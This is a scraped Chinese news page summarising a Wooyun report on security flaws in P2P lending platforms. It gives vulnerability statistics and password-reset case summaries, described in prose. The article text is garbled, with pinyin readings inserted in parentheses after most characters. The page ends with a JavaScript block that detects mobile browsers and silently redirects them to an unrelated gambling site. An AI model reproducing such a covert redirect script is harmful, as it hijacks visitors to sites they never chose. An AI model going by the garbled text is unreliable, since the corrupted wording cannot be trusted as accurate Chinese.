sbf888下载

行业新闻industrynews

乌云解构P2P安全漏洞 密码重置漏洞最普遍

时间: 2017-10-31 08:30:21 点击数: 0

近日(ri)乌云平(ping)台(tai)整(zheng)理(li)了一份关于P2P平(ping)台(tai)漏(lou)(lou)洞(dong)(dong)的(de)报(bao)告。报(bao)告数据显(xian)示,自(zi)2014年(nian)(nian)(nian)至(zhi)今(jin),平(ping)台(tai)收到的(de)有关P2P行(xing)(xing)业漏(lou)(lou)洞(dong)(dong)总数为402个,仅(jin)2015年(nian)(nian)(nian)上(shang)半年(nian)(nian)(nian)就有235个,仅(jin)上(shang)半年(nian)(nian)(nian)就比去年(nian)(nian)(nian)一年(nian)(nian)(nian)增长(zhang)了40.7%。2014年(nian)(nian)(nian)至(zhi)2015年(nian)(nian)(nian)8月乌云漏(lou)(lou)洞(dong)(dong)报(bao)告平(ping)台(tai)P2P行(xing)(xing)业漏(lou)(lou)洞(dong)(dong)数量统计显(xian)示,高危漏(lou)(lou)洞(dong)(dong)占56.2%,中(zhong)危漏(lou)(lou)洞(dong)(dong)占23.4%,低危漏(lou)(lou)洞(dong)(dong)占12.3%,8.1%被厂(chang)商忽略。

目前,有的漏(lou)洞已经修复,有的仍然存(cun)在。

2014年(nian)至今,有可能影响到资金(jin)安全(quan)的(de)漏(lou)(lou)洞就(jiu)占(zhan)来漏(lou)(lou)洞总数(shu)量的(de)39%。2015年(nian)上半年(nian)中,对资金(jin)有危害的(de)漏(lou)(lou)洞就(jiu)占(zhan)了今年(nian)P2P漏(lou)(lou)洞综述的(de)43%。

在逻辑漏(lou)(lou)洞(dong)(dong)(dong)中,密码重置漏(lou)(lou)洞(dong)(dong)(dong)占60%;访(fang)问漏(lou)(lou)洞(dong)(dong)(dong)占40%,支付漏(lou)(lou)洞(dong)(dong)(dong)占16%,其他占20%。

下面(mian)六组案(an)例大部分厂商认同(tong),并(bing)且已(yi)经(jing)修复。其中,密码重(zhong)置漏洞非常(chang)普遍——

漏洞案例一:

逻辑(ji)错误或设计缺陷导致的密码重置漏洞

涉及(ji)平台:搜易贷、翼龙贷、金海(hai)贷、和信贷、拍(pai)(pai)拍(pai)(pai)贷以及(ji)有(you)利网

简单来说,就是攻击者拿着(zhe)自己密码重置(zhi)的凭(ping)证(zheng)重置(zhi)了(le)别的密码。

比如在翼(yi)龙(long)贷的(de)案例中(zhong),通过找回密码,抓(zhua)包可以看到用户的(de)邮(you)箱、余额、手机(ji)号、ID等敏感信息(xi)。

此外,利用Email 和 ID,白帽还可以重置用户(hu)的(de)密码。

在有利网的案(an)例中,由于某(mou)个参数(shu)设置(zhi)的过(guo)于简单(dan),且发(fa)送请求时无次数(shu)限制,可(ke)以通过(guo)爆破重置(zhi)任意用户密码。

在和信贷的案例中,由(you)于设计缺陷,重置其(qi)它用(yong)户(hu)的密码不需要知(zhi)道用(yong)户(hu)邮箱收到的具体URL,可以直(zhi)接拼(pin)凑出(chu)重置其(qi)它用(yong)户(hu)密码的URL进行(xing)密码重置。

重置(zhi)密(mi)码这个类(lei)型(xing)漏洞在P2P平(ping)台比(bi)较普遍,包含爆破类(lei)型(xing)、妙改类(lei)型(xing)以及需要与人交互类(lei)型(xing)这三种,似乎“黑客”重置(zhi)用户密(mi)码变(bian)成(cheng)一个非常简单的事情。

用户的(de)密码都被重(zhong)(zhong)置了,资金还安(an)全吗?乌(wu)云平(ping)台认为,重(zhong)(zhong)置密码从来都不(bu)是(shi)(shi)一件小事(shi)情,作为跟(gen)资金相关的(de)金融平(ping)台,密码不(bu)仅是(shi)(shi)对用户的(de)一层安(an)全保障,也(ye)是(shi)(shi)自家(jia)资金安(an)全的(de)门锁(suo)之(zhi)一。

乌云平台(tai)建议开发(fa)人(ren)员在开发(fa)的过(guo)程中(zhong),应该注(zhu)意“保证Cookie等(deng)可(ke)以重(zhong)置密码的凭证与用(yong)户(hu)之间的对应关系(xi)”。

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();